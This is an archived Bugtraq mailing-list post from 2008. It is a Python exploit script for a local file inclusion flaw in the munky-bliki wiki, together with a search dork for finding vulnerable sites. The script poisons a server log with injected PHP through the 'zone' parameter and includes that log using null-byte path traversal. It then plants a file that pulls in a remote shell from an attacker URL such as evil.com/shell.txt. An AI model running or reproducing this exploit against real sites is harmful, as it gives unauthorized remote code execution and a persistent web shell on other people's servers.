lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 15 Aug 2008 10:20:09 -0000
From: r3d.w0rm@...oo.com
To: bugtraq@...urityfocus.com
Subject: munky-bliki lfi

#!user/bin/python
# -*- coding: cp1256 -*-
#####################################################################################
####                               munky-bliki Lfi                               ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz
#                                                                                   #
#DORK : "Copyright © 2004 Dovid Kopel"                                              #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/?zone=file.type%00                                                     #
#                                     [Note]                                        #
#                                                                                   #
#By this exploit u can create a shell on valun site ;)                              #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################
import httplib,urllib
site=raw_input('Site [Ex www.r3d.com]: ')
path=raw_input('Path [Ex /munky]: ')
shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')
print "[*]Powered by : R3d.W0rm - r3d.w0rm@...oo.com"
conn=httplib.HTTPConnection(site)
print "[*]Connected to " + site
print "[*]Sending shell code ..."
conn.request('GET',path + "/?zone=<?php%20$fp=fopen('r3d.w0rm.php','w%2B');fwrite($fp,'<?php%20include%20\\'" + shell + "\\';?>');fclose($fp);?>")
print "[*]Running shell code ..."
data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')
print "[*]Shell created"
print "[*]" + site + path + '/r3d.w0rm.php'




Powered by blists - more mailing lists